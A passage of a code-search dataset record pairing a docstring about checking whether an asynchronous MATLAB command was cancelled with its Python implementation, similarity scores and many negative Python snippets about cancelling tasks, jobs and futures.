at branch head')\n # Set the state of all active modules to canceled\n first_active_module_index = None\n for i in range(len(workflow.modules)):\n module = workflow.modules[i]\n if module.is_active:\n module.set_canceled()\n if first_active_module_index is None:\n first_active_module_index = i\n # Cancel all running tasks for the project branch\n for task_id in list(self.tasks.keys()):\n task = self.tasks[task_id]\n if task.project_id == project_id and task.branch_id == branch_id:\n self.backend.cancel_task(task_id)\n del self.tasks[task_id]\n if not first_active_module_index is None:\n return workflow.modules[first_active_module_index:]\n else:\n return list()", "def no_evaluation(self, *args, **kwargs):\n\t\traise InvalidOperationError(\"Placeholders cannot be evaluated!\")", "def cancel(self):\n\n self.end()\n super().cancel()", "def _cancel_automation(self) -> None:\n if HANDLE_VACATION_MODE in self.handles:\n handle = self.handles.pop(HANDLE_VACATION_MODE)\n self.cancel_timer(handle)", "def stop(self):\n # raise NotImplementedError('Subclasses should provide a concrete implementation.')\n self._isRunnable = False", "def abortFunction(self,pcaId):\n #terminate Transition if active\n if self.isPCAinTransition[pcaId]:\n self.abort = True\n self.scriptProcess.terminate()\n else:\n self.transition(pcaId,QATransitions.abort)", "def abortFunction(self,pcaId):\n #terminate Transition if active\n if self.isPCAinTransition[pcaId]:\n self.abort = True\n self.scriptProcess.terminate()\n else:\n self.transition(pcaId,QATransitions.abort)" ]
[ "0.63782734", "0.6360038", "0.570138", "0.567854", "0.5647722", "0.5620772", "0.5620772", "0.5620772", "0.5620772", "0.5569046", "0.5432427", "0.53818804", "0.53624535", "0.5357489", "0.5344577", "0.53426117", "0.53072584", "0.5285678", "0.52575773", "0.52286595", "0.5207874", "0.5192892", "0.5187083", "0.51761293", "0.51707923", "0.5170652", "0.5147012", "0.5142183", "0.51373667", "0.51373667", "0.5133434", "0.5116128", "0.5116128", "0.5116128", "0.5116128", "0.5108862", "0.510463", "0.50978136", "0.5091435", "0.5081608", "0.5081608", "0.5079088", "0.5078481", "0.5068505", "0.5066932", "0.50498736", "0.5048644", "0.50452954", "0.5033014", "0.50116205", "0.5005408", "0.50013906", "0.50013906", "0.50013906", "0.4982583", "0.4979015", "0.49703228", "0.49688262", "0.49637666", "0.49575433", "0.4951338", "0.4940297", "0.4938504", "0.4934602", "0.49318507", "0.49276438", "0.49272916", "0.4923755", "0.49147978", "0.49142885", "0.49138373", "0.49088386", "0.4906266", "0.4904335", "0.48981196", "0.48941776", "0.4875052", "0.48749304", "0.48737228", "0.4873293", "0.48670912", "0.48618034", "0.48613897", "0.48552236", "0.4855133", "0.4854855", "0.485351", "0.4845831", "0.48434573", "0.48428002", "0.48404503", "0.4833994", "0.48285818", "0.48275807", "0.48238087", "0.48053062", "0.48026788", "0.48014528", "0.4795173", "0.4795173" ]
0.67627895
0
Obtain the cancellation status of the asynchronous execution of a MATLAB command. Returns bool True if the execution is cancelled; False otherwise. Raises RejectedExecutionError an error occurs if the engine is terminated.
def cancelled(self): self.__validate_engine() return pythonengine.isCancelledFEval(self._future)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cancel(self):\n self.__validate_engine()\n return pythonengine.cancelFEval(self._future)", "def cancelled(self):\n return self._status == Future.STATUS_CANCELED", "async def cancelled(self):\n await self._refresh_and_update()\n return (\n self._operation.HasField(\"error\")\n and self._operation.error.code == code_pb2.CANCELLED\n )", "def canceled(self):\n with self._done_condition:\n return self._state == CANCELLED", "def result(self, timeout=None): \n self.__validate_engine()\n \n if self._retrieved:\n return self._result\n\n \"\"\"\n Following code is used to poll the Ctrl+C every second from keyboard in\n order to cancel a MATLAB function.\n \"\"\"\n\n try:\n result_ready = self.wait(timeout, pythonengine.waitForFEval)\n\n if not result_ready:\n raise TimeoutError(pythonengine.getMessage('MatlabFunctionTimeout'))\n\n self._result = pythonengine.getFEvalResult(self._future,self._nargout, None, out=self._out, err=self._err)\n self._retrieved = True\n return self._result\n\n except KeyboardInterrupt:\n self.cancel()\n if self.cancelled():\n print(pythonengine.getMessage('MatlabFunctionCancelled'))\n except:\n raise", "async def test_cancel(\n decoy: Decoy,\n state_store: StateStore,\n command_executor: CommandExecutor,\n subject: QueueWorker,\n) -> None:\n subject.start()\n subject.cancel()\n\n await subject.join()\n\n decoy.verify(\n await command_executor.execute(command_id=matchers.Anything()),\n times=0,\n )", "def cancel(self):\n if not self.is_cancelled:\n self.will_change_value_for('is_cancelled')\n self.cancelled = True\n # remove our dependencies so that we're ready, properly behaved operations\n # will honor the cancel flag\n self.dependencies.clear()\n self.did_change_value_for('is_cancelled')\n \n if not self.is_executing and not self.is_finished:\n with self.changing('is_finished'):\n self.finished = True", "async def cancel(self):\n result = await self.done()\n if result:\n return False\n else:\n await self._cancel()\n return True", "def cancel(self):\n with self._done_condition:\n if self._state in [RUNNING, FINISHED]:\n return False\n if self._state == CANCELLED:\n return True\n self._state = CANCELLED\n self._done_condition.notify_all()\n self.__invoke_callbacks()\n return True", "def cancel(self):\n resp = self._api.cancel_task(self._job, self.id)\n\n if resp.success:\n return True\n\n if resp.result.type is None:\n # Call was successful but task was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "async def async_cancel(self):\n raise NotImplementedError", "def test_cancel(self):\n reactor = FakeReactor()\n cancelled = []\n\n def error(f):\n cancelled.append(reactor.in_call_from_thread)\n cancelled.append(f)\n\n d = Deferred().addErrback(error)\n dr = EventualResult(d, _reactor=reactor)\n dr.cancel()\n self.assertTrue(cancelled[0])\n self.assertIsInstance(cancelled[1].value, CancelledError)", "def rstrtmgr_RmCancelCurrentTask(jitter):\n ret_ad, args = jitter.func_args_stdcall([\"dwSessionHandle\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def execute(self, condition=None, timeout=90):\n if not self.stopped:\n if timeout:\n def timeout_func():\n try:\n raise Exception('Async operation timed out after {} seconds'.format(timeout))\n except:\n self.stop(failure=sys.exc_info())\n\n self.io_loop.add_timeout(time.time() + timeout, timeout_func)\n while True:\n self.running = True\n with NullContext():\n # Wipe out the StackContext that was established in\n # self.run() so that all callbacks executed inside the\n # IOLoop will re-run it.\n self.io_loop.start()\n if (self.failure is not None or\n condition is None or condition()):\n break\n assert self.stopped\n self.stopped = False\n if self.failure is not None:\n raise self.failure[0], self.failure[1], self.failure[2]\n result = self.return_value\n self.return_value = None\n return result", "async def cancel(self, uuid) -> bool:\n await self.session.close()\n # check task is active or cancelled\n\n if not self.task.done():\n \n __task = self.__toatal_downloads[uuid][\"task\"]\n __iscancel: bool = __task.cancel()\n\n return __iscancel\n else:\n return True", "def _thread_check_stop_event(self):\n self._require_controller_modes(['running_as_thread','running_as_blocking_call'])\n return self.thread.check_stop_event()", "async def module_command_cancel(self, ctx, parsed):\n waiting = []\n wait_id = None\n cancelled = False\n if parsed.args[\"list\"]:\n waiting = [pair[1] for pair in self._delayed_commands.values()]\n else:\n wait_id = parsed.args[\"id\"]\n try:\n cancelled = True\n task, waiting = self._delayed_commands[wait_id]\n task.cancel()\n except KeyError:\n pass\n await ctx.core_command_cancel(parsed, cancelled, wait_id, waiting)", "def cancel_dispatcher_process(self):\n if not self.celery_task_id:\n return\n canceled = []\n try:\n # Use control and reply mechanism to cancel and obtain confirmation\n timeout = 5\n canceled = ControlDispatcher('dispatcher', self.controller_node).cancel([self.celery_task_id])\n except socket.timeout:\n logger.error(f'could not reach dispatcher on {self.controller_node} within {timeout}s')\n except Exception:\n logger.exception(\"error encountered when checking task status\")\n return bool(self.celery_task_id in canceled) # True or False, whether confirmation was obtained", "def cancelled(self):\n return self._is_cancelled", "def cancel(self):\n self._log.debug(\"About to cancel job {0}\".format(self.id))\n resp = self._api.cancel(self.id)\n\n if resp.success:\n self.update()\n return True\n\n if resp.result.type is None:\n # Call was successful but job was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "async def _execute(self):\n f = os.popen(self._com)\n if self._exec_time > 0:\n await asyncio.sleep_ms(self._exec_time)\n try:\n r = f.read()\n print(r)\n if self._expected_return is not None:\n if r == self._expected_return:\n return True\n return r\n else:\n return r\n except Exception as e:\n raise e\n finally:\n f.close()", "def test_immediate_cancel(self):\n # This depends on the way reactor runs callFromThread calls, so need\n # real functional test.\n program = \"\"\"\\\nimport os, threading, signal, time, sys\n\nfrom twisted.internet.defer import Deferred, CancelledError\n\nimport crochet\ncrochet.setup()\n\[email protected]_in_reactor\ndef run():\n return Deferred()\n\ner = run()\ner.cancel()\ntry:\n er.wait(1)\nexcept CancelledError:\n sys.exit(23)\nelse:\n sys.exit(3)\n\"\"\"\n process = subprocess.Popen(\n [sys.executable, \"-c\", program],\n cwd=crochet_directory, )\n self.assertEqual(process.wait(), 23)", "def test_cancel(self) -> None:\n context: Dict[str,ArtifactDescriptor] = dict()\n cmd = pycell.python_cell(\n source='import time\\ntime.sleep(5)',\n validate=True\n )\n controller = FakeWorkflowController()\n self.backend.execute_async(\n task=TaskHandle(\n task_id='000',\n project_id=self.PROJECT_ID,\n controller=controller\n ),\n command=cmd,\n artifacts=context\n )\n time.sleep(1)\n self.backend.cancel_task('000')\n time.sleep(5)\n self.assertIsNone(controller.task_id)\n self.assertIsNone(controller.state)", "def is_cancelled(self):\n if \"isCancelled\" in self._prop_dict:\n return self._prop_dict[\"isCancelled\"]\n else:\n return None", "def cancel(self) -> bool:\n # Cancel analysis first since it is queued on jobs, then cancel jobs\n # otherwise there can be a race issue when analysis starts running\n # as soon as jobs are cancelled\n analysis_cancelled = self.cancel_analysis()\n jobs_cancelled = self.cancel_jobs()\n return analysis_cancelled and jobs_cancelled", "async def test_cancelled_task(self):\n await self.cog._unsilence(self.text_channel)\n self.cog.scheduler.cancel.assert_called_once_with(self.text_channel.id)", "def cancel_analysis(self, ids: Optional[Union[str, List[str]]] = None) -> bool:\n if isinstance(ids, str):\n ids = [ids]\n\n # Lock analysis futures so we can't add more while trying to cancel\n with self._analysis_futures.lock:\n all_cancelled = True\n not_running = []\n for cid, callback in reversed(self._analysis_callbacks.items()):\n if ids and cid not in ids:\n # Skip cancelling this callback\n continue\n\n # Set event to cancel callback\n callback.event.set()\n\n # Check for running callback that can't be cancelled\n if callback.status == AnalysisStatus.RUNNING:\n all_cancelled = False\n LOG.warning(\n \"Unable to cancel running analysis callback [Experiment ID: %s]\"\n \"[Analysis Callback ID: %s]\",\n self.experiment_id,\n cid,\n )\n else:\n not_running.append(cid)\n\n # Wait for completion of other futures cancelled via event.set\n waited = futures.wait([self._analysis_futures[cid] for cid in not_running], timeout=1)\n # Get futures that didn't raise exception\n for fut in waited.done:\n if fut.done() and not fut.exception():\n cid = fut.result()[0]\n if cid in self._analysis_futures:\n del self._analysis_futures[cid]\n\n return all_cancelled", "def enableJobCancellation(cls) -> None:\n if platform.system() == \"Linux\":\n ddbcpp.sessionimpl.enableJobCancellation()\n else:\n raise RuntimeError(\"This method is only supported on Linux.\")", "async def checkpoint_if_cancelled() -> None:\n await get_async_backend().checkpoint_if_cancelled()", "def cancelled(self):\n return self._state == AsyncPostRequest._CANCELLED", "def control_cancel(self, wait_for_ready: bool = True) -> None:\n self.__logger.debug('Eva.control_cancel called')\n return self.__http_client.control_cancel(wait_for_ready=wait_for_ready)", "async def wait_for_cancel(self):\n await self._cancel", "def can_cancel(self):\n # type () -> bool\n return self.cancelable", "def getEchoCanceller(self, channel, unitCode=0):\n res = self.XAPCommand(\"AEC\", channel, unitCode=unitCode)\n return bool(int(res))", "def cancel(self) -> asyncio.Future:\n pass # pragma: no cover", "def poll(self):\n if self._worker is None:\n self.returncode = None\n return self.returncode\n elif self._worker.is_alive():\n self.returncode = None\n return self.returncode\n else:\n self.returncode = self._worker.state.return_value\n return self.returncode", "def test_cancel_status_flag(self):\n\n arg_parser = arguments.get_parser()\n\n args = arg_parser.parse_args([\n 'run',\n '-H', 'this',\n 'cancel_test.test1'\n ])\n\n run_cmd = commands.get_command(args.command_name)\n run_cmd.silence()\n run_cmd.run(self.pav_cfg, args)\n\n args = arg_parser.parse_args([\n 'cancel',\n '-s'\n ])\n\n cancel_cmd = commands.get_command(args.command_name)\n cancel_cmd.silence()\n\n self.assertEqual(cancel_cmd.run(self.pav_cfg, args), 0)", "def stopAsync(self):\n return internals.blpapi_ProviderSession_stopAsync(self.__handle) == 0", "def cancel(self):\n resp = self.ph.conn.request(\n 'POST', self.ph.URLS['cancelrun'].format(self.run_token), dict(api_key=self.ph.api_key))\n data = resp.data.decode('utf-8')\n return json.loads(data)['run_token']", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def cancel(self):\n if self.cancelled() or self.done():\n return False\n self._is_done = True\n self._is_cancelled = True\n return True", "async def async_call(self, args=None, timeout=None):\n if args is None:\n args = []\n\n # Executing command with Tornado subprocess is possible only in main thread\n if threading.main_thread().ident != threading.get_ident():\n return self.call(args=args, timeout=timeout)\n\n all_args = [self.CMD if self.CMD is not None else cfg['tools.%s.cmd' % self.NAME]]\n all_args.extend(self.COMMON_ARGS)\n all_args.extend(args)\n cmd = ' '.join(all_args),\n log.debug('Executing: %s', cmd)\n\n if self._cancelled:\n raise Exception('Task was cancelled')\n task = process.Subprocess(all_args, stderr=process.Subprocess.STREAM, stdout=process.Subprocess.STREAM)\n self.proc = task.proc\n\n coroutine = gen.multi([task.wait_for_exit(raise_error=False),\n task.stdout.read_until_close(),\n task.stderr.read_until_close()])\n\n if not timeout:\n return_code, stdout, stderr = await coroutine\n else:\n try:\n return_code, stdout, stderr = await gen.with_timeout(timedelta(seconds=timeout), coroutine)\n except gen.TimeoutError as exception:\n log.exception(\"Command %s timed out after %s while executing %s\", self.NAME, timeout, cmd)\n task.proc.kill()\n raise exception\n\n self.proc = None\n\n if return_code != 0:\n log.warning(\"Command '%s' failed wit exit code: %s\", cmd, return_code)\n log.debug(\"Command '%s':\\nSTDOUT:\\n%s\\nSTDERR:\\n%s\", cmd, stdout, stderr)\n if self.RAISE_ERROR:\n raise subprocess.CalledProcessError(return_code, cmd)\n\n return self.parser.parse(stdout.decode('utf-8'), stderr.decode('utf-8'))", "def shellExecErrorCode(cmd):\n return subprocess.call(cmd, shell=True)", "def test_cancel(self):\n\n arg_parser = arguments.get_parser()\n\n args = arg_parser.parse_args([\n 'run',\n '-H', 'this',\n 'cancel_test'\n ])\n run_cmd = commands.get_command(args.command_name)\n run_cmd.silence()\n run_cmd.run(self.pav_cfg, args)\n\n args = arg_parser.parse_args([\n 'cancel'\n ])\n\n get_statuses(self.pav_cfg, args.tests)\n\n cancel_cmd = commands.get_command(args.command_name)\n cancel_cmd.silence()\n\n self.assertEqual(cancel_cmd.run(self.pav_cfg, args), 0)", "def executeCommand(commandtoexecute):\n try:\n _output = commands.getstatusoutput(commandtoexecute)\n except Exception as er:\n print \"not able to execute command\"\n return False\n return _output", "def _checkCommandStatus(self, lastCommand=False):\n p = self.spawnProc\n p.sendline('echo $?')\n regex = re.compile('^[0-9]+',re.M)\n p.expect(regex, 2)\n msg = '_checkCommandStatus : Execution of command FAILED'\n \tif lastCommand:\n \t msg = '_checkCommandStatus :Execution of command : \"%s\" FAILED' %lastCommand\n if p.after != '0' and p.after != '99':\n raise AssertionError(msg)", "def execute_task(self, filename):\n stdin, stdout, stderr = self.ssh.exec_command(open(filename).read())\n if stdout.channel.recv_exit_status() == 0:\n return True, stdout.read().strip(), stderr.read().strip()\n else:\n return False, stdout.read().strip(), stderr.read().strip()", "def iscanceled(*args):", "def get(self, retry_on_failure=True):\n done = threading.Event()\n\n api.cancel_callbacks.add(done.set)\n self.on_result(lambda _result: done.set())\n done.wait()\n api.cancel_callbacks.discard(done.set)\n\n if api.has_cancel_request():\n if self._result is self._NOT_SET:\n self.result = api.ExecutionCancelled()\n raise self.result\n\n ctx = self.task.workflow_context\n if not ctx.internal.graph_mode:\n ctx.internal.task_graph.remove_task(self.task)\n\n if self.task.get_state() in (TASK_FAILED, TASK_RESCHEDULED):\n handler_result = self.task.handle_task_terminated()\n if handler_result.retried_task and retry_on_failure:\n handler_result.retried_task.apply_async()\n return handler_result.retried_task.async_result.get()\n else:\n raise self.result\n return self._result", "def test_cancel(self):\n g = TaskDependencyGraph(MockWorkflowContext())\n task = mock.Mock()\n g.add_task(task)\n with mock.patch('cloudify.workflows.api.cancel_request', True):\n self.assertRaises(api.ExecutionCancelled, g.execute)\n\n self.assertFalse(task.apply_async.called)\n self.assertFalse(task.cancel.called)", "async def test_job_async_canceled(my_job_async):\n\n # Set up callback to get notifications when job state changes.\n job = None\n\n def on_job_update(_job):\n \"\"\"The callback to update `job`.\"\"\"\n nonlocal job\n job = _job\n\n if job.state in ['DONE', 'ERROR', 'WORKING']:\n canceled = my_job_async.job_manager_class.cancel(job.id)\n assert not canceled, (\n f'Uncancelable job is canceled in the `{job.state}` state!')\n\n my_job_async.set_on_update(on_job_update)\n\n # Submit a job that fails.\n await my_job_async.job(mustfail=True)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job_async.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'ERROR', f'Failed job has wrong state `{job.state}`!'\n\n # Submit a job that succeeds.\n await my_job_async.job(mustfail=False)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job_async.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'DONE', f'Finished job has wrong state `{job.state}`!'", "def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"cancel_operation\" not in self._stubs:\n self._stubs[\"cancel_operation\"] = self.grpc_channel.unary_unary(\n \"/google.longrunning.Operations/CancelOperation\",\n request_serializer=operations_pb2.CancelOperationRequest.SerializeToString,\n response_deserializer=None,\n )\n return self._stubs[\"cancel_operation\"]", "def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"cancel_operation\" not in self._stubs:\n self._stubs[\"cancel_operation\"] = self.grpc_channel.unary_unary(\n \"/google.longrunning.Operations/CancelOperation\",\n request_serializer=operations_pb2.CancelOperationRequest.SerializeToString,\n response_deserializer=None,\n )\n return self._stubs[\"cancel_operation\"]", "def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"cancel_operation\" not in self._stubs:\n self._stubs[\"cancel_operation\"] = self.grpc_channel.unary_unary(\n \"/google.longrunning.Operations/CancelOperation\",\n request_serializer=operations_pb2.CancelOperationRequest.SerializeToString,\n response_deserializer=None,\n )\n return self._stubs[\"cancel_operation\"]", "def cancel(self):\n return self.RES_OK", "def query_abort(self) -> bool:\n return self._workers[threading.get_ident()].abort", "def getNoiseCancellation(self, channel, group, unitCode=0):\n resp = self.XAPCommand('NCSEL', channel, group, unitCode=unitCode)\n return bool(int(resp))", "def returncode(self) -> Optional[Union[int, str]]:\n return self.proc.poll() # type: ignore", "def stop(self):\r\n cfunc = lib_importer.windll.DAQmxStopTask\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [lib_importer.task_handle]\r\n\r\n error_code = cfunc(self._handle)\r\n check_for_error(error_code)", "async def cancel():\n await asyncio.get_running_loop().run_in_executor(None, cancel_inner)", "async def wait():\n try:\n await asyncio.get_running_loop().run_in_executor(None, wait_inner)\n except asyncio.CancelledError:\n await cancel()\n raise\n finally:\n kernel32.CloseHandle(timer)\n kernel32.CloseHandle(cancel_event)", "def _cancelCommands(self, reason):\n while self._current:\n cmd = self._current.pop(0)\n cmd.fail(reason)", "async def _wait_execute(self, address, command, args, kw):\n conn = await self.acquire(command, args)\n try:\n return (await conn.execute(command, *args, **kw))\n finally:\n self.release(conn)", "def is_terminated_properly(executor):\n return executor._broken or executor._shutdown_thread", "def is_canceled(self):\n\n if self.status == self.STATUS['CANCELED']:\n return True\n else:\n return False", "async def _condor_tool(\n resource_attributes: Tuple[AttributeDict, ...],\n executor: Executor,\n command: str,\n success_message: str,\n) -> Iterable[bool]:\n command = (\n command\n + \" \"\n + \" \".join(\n _job_id(resource.remote_resource_uuid) for resource in resource_attributes\n )\n )\n try:\n response = await executor.run_command(command)\n except CommandExecutionFailure as cef:\n # the tool fails if none of the jobs are found – because they all just shut down\n # report graceful failure for all\n if cef.exit_code == 1 and \"not found\" in cef.stderr:\n return [False] * len(resource_attributes)\n raise\n # successes are in stdout, failures in stderr, both in argument order\n # stdout: Job 15540.0 marked for removal\n # stderr: Job 15612.0 not found\n # stderr: Job 15535.0 marked for removal\n success_jobs = {\n TOOL_ID_PATTERN.search(line).group(1)\n for line in response.stdout.splitlines()\n if line.endswith(success_message)\n }\n return (\n _job_id(resource.remote_resource_uuid) in success_jobs\n for resource in resource_attributes\n )", "def isfailure(self):\n\n return self.proc.returncode != 0", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def is_cancelled(self):\n\n return self._state == \"CANCELLED\"", "def cancel_exec(\n self, \n project_id: str, \n branch_id: str\n ) -> Optional[List[ModuleHandle]]:\n with self.backend.lock:\n # Get the handle for the head workflow of the specified branch.\n branch = self.projects.get_branch(project_id=project_id, branch_id=branch_id)\n if branch is None:\n return None\n workflow = branch.get_head()\n if workflow is None:\n raise ValueError('empty workflow at branch head')\n # Set the state of all active modules to canceled\n first_active_module_index = None\n for i in range(len(workflow.modules)):\n module = workflow.modules[i]\n if module.is_active:\n module.set_canceled()\n if first_active_module_index is None:\n first_active_module_index = i\n # Cancel all running tasks for the project branch\n for task_id in list(self.tasks.keys()):\n task = self.tasks[task_id]\n if task.project_id == project_id and task.branch_id == branch_id:\n self.backend.cancel_task(task_id)\n del self.tasks[task_id]\n if not first_active_module_index is None:\n return workflow.modules[first_active_module_index:]\n else:\n return list()", "def _retrieve_result(self, out):\n try:\n result = self.parallel._backend.retrieve_result_callback(out)\n outcome = dict(status=TASK_DONE, result=result)\n except BaseException as e:\n # Avoid keeping references to parallel in the error.\n e.__traceback__ = None\n outcome = dict(result=e, status=TASK_ERROR)\n\n self._register_outcome(outcome)\n return outcome['status'] != TASK_ERROR", "def cancel(self):\n\n query = f\"scancel {self.jobid}\"\n if self.cluster:\n query = f\"scancel {self.jobid} --clusters={self.cluster}\"\n\n cmd = BuildTestCommand(query)\n cmd.execute()\n logger.debug(f\"Cancelling Job: {self.jobid} by running: {query}\")\n\n self.poll()\n self._state = \"CANCELLED\"", "def _check_job_status(self):\n try:\n status = self.ee2.check_job_canceled({\"job_id\": self.job_id})\n except Exception as e:\n self.logger.error(\n f\"Warning: Job cancel check failed due to {e}. However, the job will continue to run.\"\n )\n return True\n if status.get(\"finished\", False):\n return False\n return True", "def cancelled(self) -> bool:\n return self._cancelled is not None", "def isCancelled(self): #$NON-NLS-1$\r", "def cancel_work(self, message=\"This test was cancelled by lifeguard script because the test was interrupting progress (taking too long).\"):\n slick = SlickAsPy(self.environment.slickurl + \"/api\")\n status = slick.get_host_status(self.name)\n if status['currentWork'] is not None:\n slick.cancel_result(status['currentWork'], message)", "def _async_raise(self,tid, exctype):#强行终止进程方法\r\n tid = ctypes.c_long(tid)\r\n if not inspect.isclass(exctype):\r\n exctype = type(exctype)\r\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\r\n if res == 0:\r\n raise ValueError(\"invalid thread id\")\r\n elif res != 1:\r\n # \"\"\"if it returns a number greater than one, you're in trouble,\r\n # and you should call it again with exc=NULL to revert the effect\"\"\"\r\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\r\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")", "def _execute(self) -> Any:\n result = self.func(*self.args, **self.kwargs)\n if asyncio.iscoroutine(result):\n loop = asyncio.new_event_loop()\n coro_result = loop.run_until_complete(result)\n return coro_result\n return result", "def __try_command(cmd, description):\n try:\n out = subprocess.check_output(cmd, stderr=subprocess.STDOUT);\n return (True, out.decode(\"utf-8\")) # success\n except subprocess.CalledProcessError as e:\n print(\"Error while {:s}, return code is non-zero ({:d})\".format(description, e.returncode))\n print(\"Command: {:s}\".format(\" \".join(e.cmd)))\n if e.output:\n print(\"Output: {:s}\".format(e.output.decode(\"utf-8\").strip()))\n\n return (False, None) # error", "def disconnect(self):\n\t\treturn Job(SDK.PrlVmDev_Disconnect(self.handle)[0])", "def test_reactor_stop_unblocks_EventualResult_in_threadpool(self):\n program = \"\"\"\\\nimport os, threading, signal, time, sys\n\nfrom twisted.internet.defer import Deferred\nfrom twisted.internet import reactor\n\nimport crochet\ncrochet.setup()\n\[email protected]_in_reactor\ndef run():\n reactor.callLater(0.1, reactor.stop)\n return Deferred()\n\nresult = [13]\ndef inthread():\n er = run()\n try:\n er.wait(timeout=10)\n except crochet.ReactorStopped:\n result[0] = 23\nreactor.callInThread(inthread)\ntime.sleep(1)\nsys.exit(result[0])\n\"\"\"\n process = subprocess.Popen([sys.executable, \"-c\", program],\n cwd=crochet_directory)\n self.assertEqual(process.wait(), 23)", "def is_task_done(self):\r\n is_task_done = c_bool32()\r\n\r\n cfunc = lib_importer.windll.DAQmxIsTaskDone\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [\r\n lib_importer.task_handle, ctypes.POINTER(c_bool32)]\r\n\r\n error_code = cfunc(\r\n self._handle, ctypes.byref(is_task_done))\r\n check_for_error(error_code)\r\n\r\n return is_task_done.value", "def test_reactor_stop_unblocks_EventualResult(self):\n program = \"\"\"\\\nimport os, threading, signal, time, sys\n\nfrom twisted.internet.defer import Deferred\nfrom twisted.internet import reactor\n\nimport crochet\ncrochet.setup()\n\[email protected]_in_reactor\ndef run():\n reactor.callLater(0.1, reactor.stop)\n return Deferred()\n\ner = run()\ntry:\n er.wait(timeout=10)\nexcept crochet.ReactorStopped:\n sys.exit(23)\n\"\"\"\n process = subprocess.Popen([sys.executable, \"-c\", program],\n cwd=crochet_directory)\n self.assertEqual(process.wait(), 23)", "def terminal_condition(self) -> 'outputs.GoogleCloudRunV2ConditionResponse':\n return pulumi.get(self, \"terminal_condition\")", "def cancelok(foo):\n @functools.wraps(foo)\n async def wrapper(*args, **kwargs):\n try:\n return await foo(*args, **kwargs)\n except asyncio.CancelledError:\n return\n return wrapper", "def _thread_check_abort_event(self):\n self._require_controller_modes('thread_initialized')\n return self.thread.check_abort_event()", "def EnableAsyncConfSlavePortStatusDelete(self):\n\t\treturn self._get_attribute('enableAsyncConfSlavePortStatusDelete')", "async def test_job_canceled(my_job):\n\n # Set up callback to get notifications when job state changes.\n job = None\n\n def on_job_update(_job):\n \"\"\"The callback to update `job`.\"\"\"\n nonlocal job\n job = _job\n\n if job.state in ['WORKING', 'DONE', 'ERROR']:\n canceled = my_job.job_manager_class.cancel(job.id)\n assert not canceled, (\n f'Uncancelable job is canceled in the `{job.state}` state!')\n\n my_job.set_on_update(on_job_update)\n\n # Submit a job that fails.\n await my_job.job(mustfail=True)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'ERROR', f'Failed job has wrong state `{job.state}`!'\n\n # Submit a job that succeeds.\n await my_job.job(mustfail=False)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'DONE', f'Finished job has wrong state `{job.state}`!'", "def is_aborted(self, **kwargs):\n task_id = kwargs.get('task_id', self.request.id)\n result = self.AsyncResult(task_id)\n if not isinstance(result, AbortableAsyncResult):\n return False\n return result.is_aborted()", "def test_cancel_sync_handle_call_during_execution(serve_instance):\n running_signal_actor = SignalActor.remote()\n cancelled_signal_actor = SignalActor.remote()\n\n @serve.deployment\n class Ingress:\n async def __call__(self, *args):\n await running_signal_actor.send.remote()\n await send_signal_on_cancellation(cancelled_signal_actor)\n\n h = serve.run(Ingress.bind()).options(use_new_handle_api=True)\n\n # Send a request and wait for it to start executing.\n r = h.remote()\n ray.get(running_signal_actor.wait.remote(), timeout=10)\n\n # Cancel it and verify that it is cancelled via signal.\n r.cancel()\n ray.get(cancelled_signal_actor.wait.remote(), timeout=10)\n\n with pytest.raises(ray.exceptions.TaskCancelledError):\n r.result()", "def wait_for_command_execution(self, timeout=None, check_fun=None):\n if check_fun is None:\n def check_fun2(buf, whole_data):\n # TODO: expose via logging config entry\n if self.verbose_logger is not None:\n self.verbose_logger.debug(\"expecting '%s', got: '%s'\", self.shell_prompt, buf)\n\n return self.re_shell_prompt.search(whole_data)\n\n check_fun = check_fun2\n try:\n res = self.process_output(\n NetUtil.wait_for_socket_result(self.sock,\n check_fun,\n read_buf_size=SOCKET_READ_BUF_SIZE,\n timeout=timeout\n )\n )\n except NetUtil.Timeout as e:\n # netstat_uds = run_shell(\"netstat -ape -A unix\")\n # open_fds = run_shell('ls -l /proc/%s/fd/' % os.getpid())\n # lsof = run_shell('lsof -U')\n # debug:\n\n # Active Unix Domain Sockets:\n # %s.\n # Open file handles (Unix):\n # %s\n # lsof:\n # %s\n # % (netstat_uds, open_fds, lsof))\n # log exception to node log\n if self.brief_logger:\n self.brief_logger.exception(e)\n\n raise\n return res", "async def execute(self):\n eq = False\n for i in range(self._iterations):\n r = await self._execute()\n if r == self._expected_return:\n eq = True\n await asyncio.sleep_ms(self._iter_delay)\n return eq if eq is True else r", "async def wait(self):\n if self.poll() is None:\n await wait_child_exiting(self)\n self._proc.wait()\n else:\n await _core.checkpoint()\n return self.returncode", "def cancel(self):\n 